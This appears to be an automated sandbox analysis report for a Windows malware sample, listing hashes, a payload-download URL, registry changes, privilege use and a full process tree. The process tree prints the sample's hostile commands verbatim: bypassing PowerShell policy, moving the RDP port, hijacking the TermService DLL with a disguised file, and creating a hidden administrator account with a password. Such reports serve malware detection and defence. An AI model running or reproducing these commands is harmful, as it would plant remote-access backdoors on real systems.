Resubmissions
02-09-2021 16:57
210902-vgpzjadhhn 1002-09-2021 16:25
210902-tw1h5sage4 1002-09-2021 11:31
210902-9dk89x9wb2 1014-08-2021 13:56
210814-xdxpv1yk2x 10Analysis
-
max time kernel
1707s -
max time network
1710s -
platform
windows10_x64 -
resource
win10-en -
submitted
02-09-2021 11:31
Static task
static1
Behavioral task
behavioral1
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win7-en
Behavioral task
behavioral2
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win10-en
General
-
Target
472208d7ba18d4c14b7e90b9db5d6feb.exe
-
Size
5.9MB
-
MD5
472208d7ba18d4c14b7e90b9db5d6feb
-
SHA1
ff24cc43998ff99e61b1a838e1d51c4888498935
-
SHA256
ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
-
SHA512
9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 19 4060 powershell.exe 21 4060 powershell.exe 22 4060 powershell.exe 23 4060 powershell.exe 25 4060 powershell.exe 27 4060 powershell.exe 29 4060 powershell.exe 31 4060 powershell.exe 33 4060 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 4044 4044 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0xgmxbov.hqa.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4622.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4642.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4653.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4684.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4673.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4d1wes5w.ykw.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 300 powershell.exe 300 powershell.exe 300 powershell.exe 3656 powershell.exe 3656 powershell.exe 3656 powershell.exe 2304 powershell.exe 2304 powershell.exe 2304 powershell.exe 2272 powershell.exe 2272 powershell.exe 2272 powershell.exe 300 powershell.exe 300 powershell.exe 300 powershell.exe 4060 powershell.exe 4060 powershell.exe 4060 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 596 596 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3664 472208d7ba18d4c14b7e90b9db5d6feb.exe Token: SeDebugPrivilege 300 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeIncreaseQuotaPrivilege 3656 powershell.exe Token: SeSecurityPrivilege 3656 powershell.exe Token: SeTakeOwnershipPrivilege 3656 powershell.exe Token: SeLoadDriverPrivilege 3656 powershell.exe Token: SeSystemProfilePrivilege 3656 powershell.exe Token: SeSystemtimePrivilege 3656 powershell.exe Token: SeProfSingleProcessPrivilege 3656 powershell.exe Token: SeIncBasePriorityPrivilege 3656 powershell.exe Token: SeCreatePagefilePrivilege 3656 powershell.exe Token: SeBackupPrivilege 3656 powershell.exe Token: SeRestorePrivilege 3656 powershell.exe Token: SeShutdownPrivilege 3656 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeSystemEnvironmentPrivilege 3656 powershell.exe Token: SeRemoteShutdownPrivilege 3656 powershell.exe Token: SeUndockPrivilege 3656 powershell.exe Token: SeManageVolumePrivilege 3656 powershell.exe Token: 33 3656 powershell.exe Token: 34 3656 powershell.exe Token: 35 3656 powershell.exe Token: 36 3656 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeIncreaseQuotaPrivilege 2304 powershell.exe Token: SeSecurityPrivilege 2304 powershell.exe Token: SeTakeOwnershipPrivilege 2304 powershell.exe Token: SeLoadDriverPrivilege 2304 powershell.exe Token: SeSystemProfilePrivilege 2304 powershell.exe Token: SeSystemtimePrivilege 2304 powershell.exe Token: SeProfSingleProcessPrivilege 2304 powershell.exe Token: SeIncBasePriorityPrivilege 2304 powershell.exe Token: SeCreatePagefilePrivilege 2304 powershell.exe Token: SeBackupPrivilege 2304 powershell.exe Token: SeRestorePrivilege 2304 powershell.exe Token: SeShutdownPrivilege 2304 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeSystemEnvironmentPrivilege 2304 powershell.exe Token: SeRemoteShutdownPrivilege 2304 powershell.exe Token: SeUndockPrivilege 2304 powershell.exe Token: SeManageVolumePrivilege 2304 powershell.exe Token: 33 2304 powershell.exe Token: 34 2304 powershell.exe Token: 35 2304 powershell.exe Token: 36 2304 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeIncreaseQuotaPrivilege 2272 powershell.exe Token: SeSecurityPrivilege 2272 powershell.exe Token: SeTakeOwnershipPrivilege 2272 powershell.exe Token: SeLoadDriverPrivilege 2272 powershell.exe Token: SeSystemProfilePrivilege 2272 powershell.exe Token: SeSystemtimePrivilege 2272 powershell.exe Token: SeProfSingleProcessPrivilege 2272 powershell.exe Token: SeIncBasePriorityPrivilege 2272 powershell.exe Token: SeCreatePagefilePrivilege 2272 powershell.exe Token: SeBackupPrivilege 2272 powershell.exe Token: SeRestorePrivilege 2272 powershell.exe Token: SeShutdownPrivilege 2272 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeSystemEnvironmentPrivilege 2272 powershell.exe Token: SeRemoteShutdownPrivilege 2272 powershell.exe Token: SeUndockPrivilege 2272 powershell.exe Token: SeManageVolumePrivilege 2272 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3664 wrote to memory of 300 3664 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 3664 wrote to memory of 300 3664 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 300 wrote to memory of 3464 300 powershell.exe csc.exe PID 300 wrote to memory of 3464 300 powershell.exe csc.exe PID 3464 wrote to memory of 1456 3464 csc.exe cvtres.exe PID 3464 wrote to memory of 1456 3464 csc.exe cvtres.exe PID 300 wrote to memory of 3656 300 powershell.exe powershell.exe PID 300 wrote to memory of 3656 300 powershell.exe powershell.exe PID 300 wrote to memory of 2304 300 powershell.exe powershell.exe PID 300 wrote to memory of 2304 300 powershell.exe powershell.exe PID 300 wrote to memory of 2272 300 powershell.exe powershell.exe PID 300 wrote to memory of 2272 300 powershell.exe powershell.exe PID 300 wrote to memory of 2320 300 powershell.exe reg.exe PID 300 wrote to memory of 2320 300 powershell.exe reg.exe PID 300 wrote to memory of 2180 300 powershell.exe reg.exe PID 300 wrote to memory of 2180 300 powershell.exe reg.exe PID 300 wrote to memory of 3816 300 powershell.exe reg.exe PID 300 wrote to memory of 3816 300 powershell.exe reg.exe PID 300 wrote to memory of 1968 300 powershell.exe net.exe PID 300 wrote to memory of 1968 300 powershell.exe net.exe PID 1968 wrote to memory of 3900 1968 net.exe net1.exe PID 1968 wrote to memory of 3900 1968 net.exe net1.exe PID 300 wrote to memory of 3580 300 powershell.exe cmd.exe PID 300 wrote to memory of 3580 300 powershell.exe cmd.exe PID 3580 wrote to memory of 3312 3580 cmd.exe cmd.exe PID 3580 wrote to memory of 3312 3580 cmd.exe cmd.exe PID 3312 wrote to memory of 1856 3312 cmd.exe net.exe PID 3312 wrote to memory of 1856 3312 cmd.exe net.exe PID 1856 wrote to memory of 2784 1856 net.exe net1.exe PID 1856 wrote to memory of 2784 1856 net.exe net1.exe PID 300 wrote to memory of 2352 300 powershell.exe cmd.exe PID 300 wrote to memory of 2352 300 powershell.exe cmd.exe PID 2352 wrote to memory of 1408 2352 cmd.exe cmd.exe PID 2352 wrote to memory of 1408 2352 cmd.exe cmd.exe PID 1408 wrote to memory of 2240 1408 cmd.exe net.exe PID 1408 wrote to memory of 2240 1408 cmd.exe net.exe PID 2240 wrote to memory of 588 2240 net.exe net1.exe PID 2240 wrote to memory of 588 2240 net.exe net1.exe PID 2860 wrote to memory of 3288 2860 cmd.exe net.exe PID 2860 wrote to memory of 3288 2860 cmd.exe net.exe PID 3288 wrote to memory of 3140 3288 net.exe net1.exe PID 3288 wrote to memory of 3140 3288 net.exe net1.exe PID 3816 wrote to memory of 1968 3816 cmd.exe net.exe PID 3816 wrote to memory of 1968 3816 cmd.exe net.exe PID 1968 wrote to memory of 2892 1968 net.exe net1.exe PID 1968 wrote to memory of 2892 1968 net.exe net1.exe PID 1396 wrote to memory of 3252 1396 cmd.exe net.exe PID 1396 wrote to memory of 3252 1396 cmd.exe net.exe PID 3252 wrote to memory of 1180 3252 net.exe net1.exe PID 3252 wrote to memory of 1180 3252 net.exe net1.exe PID 2780 wrote to memory of 3656 2780 cmd.exe net.exe PID 2780 wrote to memory of 3656 2780 cmd.exe net.exe PID 3656 wrote to memory of 2860 3656 net.exe net1.exe PID 3656 wrote to memory of 2860 3656 net.exe net1.exe PID 2368 wrote to memory of 1548 2368 cmd.exe net.exe PID 2368 wrote to memory of 1548 2368 cmd.exe net.exe PID 1548 wrote to memory of 3816 1548 net.exe net1.exe PID 1548 wrote to memory of 3816 1548 net.exe net1.exe PID 2272 wrote to memory of 2200 2272 cmd.exe net.exe PID 2272 wrote to memory of 2200 2272 cmd.exe net.exe PID 2200 wrote to memory of 1396 2200 net.exe net1.exe PID 2200 wrote to memory of 1396 2200 net.exe net1.exe PID 2304 wrote to memory of 3748 2304 cmd.exe WMIC.exe PID 2304 wrote to memory of 3748 2304 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:300 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cxy0z5je\cxy0z5je.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF4C.tmp" "c:\Users\Admin\AppData\Local\Temp\cxy0z5je\CSC2711327840E84D67AC10C09FEDF1C4E4.TMP"4⤵PID:1456
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2320
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2180 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3816
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3900
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2784
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:588
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4092
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:4036
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3140
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 7IbL5mSj /add1⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 7IbL5mSj /add2⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 7IbL5mSj /add3⤵PID:2892
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1180
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GSNTPAWQ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GSNTPAWQ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GSNTPAWQ$ /ADD3⤵PID:2860
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3816
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 7IbL5mSj1⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 7IbL5mSj2⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 7IbL5mSj3⤵PID:1396
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:3748
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2428
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3044
-
